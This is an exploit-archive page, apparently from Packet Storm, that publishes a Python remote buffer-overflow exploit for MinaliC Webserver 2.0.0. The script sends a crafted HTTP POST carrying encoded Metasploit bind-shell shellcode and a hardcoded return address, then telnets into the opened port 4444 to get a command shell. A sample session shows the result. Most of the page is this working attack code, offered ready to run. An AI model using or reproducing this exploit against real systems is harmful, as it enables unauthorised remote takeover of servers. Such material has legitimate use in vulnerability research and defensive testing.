exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MinaliC Webserver 2.0.0 Buffer Overflow

MinaliC Webserver 2.0.0 Buffer Overflow
Posted Apr 19, 2013
Authored by Antonius | Site cr0security.com

MinaliC Webserver version 2.0.0 buffer overflow exploit that binds a shell to port 4444. Works on Windows Server 2003 SP3 only.

tags | exploit, overflow, shell
systems | windows
SHA-256 | 0f734001f936a5b891c34b75bd2c451e9c1b32b8939d772c3c1bc8137fb7edaf

MinaliC Webserver 2.0.0 Buffer Overflow

Change Mirror Download
#!/usr/bin/env python
# Title : MinaliC Webserver 2.0.0 Post Method Remote Command Execution
# (Works for Windows Server 2003 sp2 Only)
#
# Date: 12 Apr 2013
#
# Exploit Author: Antonius - (http://www.cr0security.com - http://www.codewall-security.com)
#
# Thanks : http://www.offensive-security.com , http://www.security-hooligan.com, http://www.techorganic.com & Indonesian Backtrack Team
#
# Vendor Homepage: http://minalic.sourceforge.net
#
# Version: MinaliC Webserver 2.0.0
#
# Tested on: Windows Server 2003 Service Pack 2, English
#
# Description:
# Stack based buffer overflow occur when minalic 2.0.0 handles http post method. This exploit tested and works on windows server 2003 sp2 only.
# Exploitation will failed if specify wrong path
# Usage : ./exploit.py ip_address minalic_bin_path
#cr0security@cr0security-Vostro1310:~/Desktop/ctp_exercise/working_exploit$ python exploit.py 192.168.1.2 'c:\minalic\bin'
#Sending Exploit Please Wait
#Trying 192.168.1.2...
#Connected to 192.168.1.2.
#Escape character is '^]'.
#Microsoft Windows [Version 5.2.3790]
#(C) Copyright 1985-2003 Microsoft Corp.
#C:\minalic\bin>

import socket, struct,os, sys, time

if len(sys.argv) < 2 :
print "MinaliC Webserver Post Method Remote Command Execution (Works for Windows Server 2003 sp2 Only)"
print "Usage : ./exploit.py 'ip address' 'path of minalic binary'"
print "Example : python exploit.py 192.168.1.2 'c:\minalic\bin'"
sys.exit(1)
ip = sys.argv[1]
if len(sys.argv) > 2 :
path_length = len(sys.argv[2])
path = sys.argv[2]
else :
path_length = 14
if path_length > 14 :
#if path not at C:\minalic\bin we must recalculate preceed length to overwrite eip
junk = "\x90" * (240 - (len(path) - 14))
else :
#default path at C:\minalic\bin
junk = "\x90" * 240

#only have 4 bytes, jmp for more
first_stage = "\xeb\xd0" + "\x90" * 2

#ecx points to our controlled buffer, so we do a jmp to ecx
second_stage = "\x83\xc1\x04\xff\xe1"

sec2 = junk + second_stage

#0x7C86A01B jmp esp from ntdll.dll on windows server 2003
ret = "\x1B\xA0\x86\x7C"

host = "\xff" * 140

# metasploit windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=127.0.0.1,
shellcode = ("\xbd\x78\x69\xd9\xaa\xd9\xc0\xd9\x74\x24\xf4\x58\x2b\xc9" +
"\xb1\x56\x83\xe8\xfc\x31\x68\x0f\x03\x68\x77\x8b\x2c\x56" +
"\x6f\xc2\xcf\xa7\x6f\xb5\x46\x42\x5e\xe7\x3d\x06\xf2\x37" +
"\x35\x4a\xfe\xbc\x1b\x7f\x75\xb0\xb3\x70\x3e\x7f\xe2\xbf" +
"\xbf\xb1\x2a\x13\x03\xd3\xd6\x6e\x57\x33\xe6\xa0\xaa\x32" +
"\x2f\xdc\x44\x66\xf8\xaa\xf6\x97\x8d\xef\xca\x96\x41\x64" +
"\x72\xe1\xe4\xbb\x06\x5b\xe6\xeb\xb6\xd0\xa0\x13\xbd\xbf" +
"\x10\x25\x12\xdc\x6d\x6c\x1f\x17\x05\x6f\xc9\x69\xe6\x41" +
"\x35\x25\xd9\x6d\xb8\x37\x1d\x49\x22\x42\x55\xa9\xdf\x55" +
"\xae\xd3\x3b\xd3\x33\x73\xc8\x43\x90\x85\x1d\x15\x53\x89" +
"\xea\x51\x3b\x8e\xed\xb6\x37\xaa\x66\x39\x98\x3a\x3c\x1e" +
"\x3c\x66\xe7\x3f\x65\xc2\x46\x3f\x75\xaa\x37\xe5\xfd\x59" +
"\x2c\x9f\x5f\x36\x81\x92\x5f\xc6\x8d\xa5\x2c\xf4\x12\x1e" +
"\xbb\xb4\xdb\xb8\x3c\xba\xf6\x7d\xd2\x45\xf8\x7d\xfa\x81" +
"\xac\x2d\x94\x20\xcc\xa5\x64\xcc\x19\x69\x35\x62\xf1\xca" +
"\xe5\xc2\xa1\xa2\xef\xcc\x9e\xd3\x0f\x07\xa9\xd3\xc1\x73" +
"\xfa\xb3\x23\x84\xed\x1f\xad\x62\x67\xb0\xfb\x3d\x1f\x72" +
"\xd8\xf5\xb8\x8d\x0a\xaa\x11\x1a\x02\xa4\xa5\x25\x93\xe2" +
"\x86\x8a\x3b\x65\x5c\xc1\xff\x94\x63\xcc\x57\xde\x5c\x87" +
"\x22\x8e\x2f\x39\x32\x9b\xc7\xda\xa1\x40\x17\x94\xd9\xde" +
"\x40\xf1\x2c\x17\x04\xef\x17\x81\x3a\xf2\xce\xea\xfe\x29" +
"\x33\xf4\xff\xbc\x0f\xd2\xef\x78\x8f\x5e\x5b\xd5\xc6\x08" +
"\x35\x93\xb0\xfa\xef\x4d\x6e\x55\x67\x0b\x5c\x66\xf1\x14" +
"\x89\x10\x1d\xa4\x64\x65\x22\x09\xe1\x61\x5b\x77\x91\x8e" +
"\xb6\x33\xa1\xc4\x9a\x12\x2a\x81\x4f\x27\x37\x32\xba\x64" +
"\x4e\xb1\x4e\x15\xb5\xa9\x3b\x10\xf1\x6d\xd0\x68\x6a\x18" +
"\xd6\xdf\x8b\x09")

agent = "User-Agent: " + "\x90" * (898 - len(shellcode)) + shellcode
payload = "POST /" + sec2 + ret + first_stage + " HTTP/1.1\r\n" + "Host: " + host + "\r\n" + agent + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 8080))
s.send(payload)
s.close()
print "Sending Exploit Please Wait"
time.sleep(15)
os.system("telnet " + ip + " 4444")
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close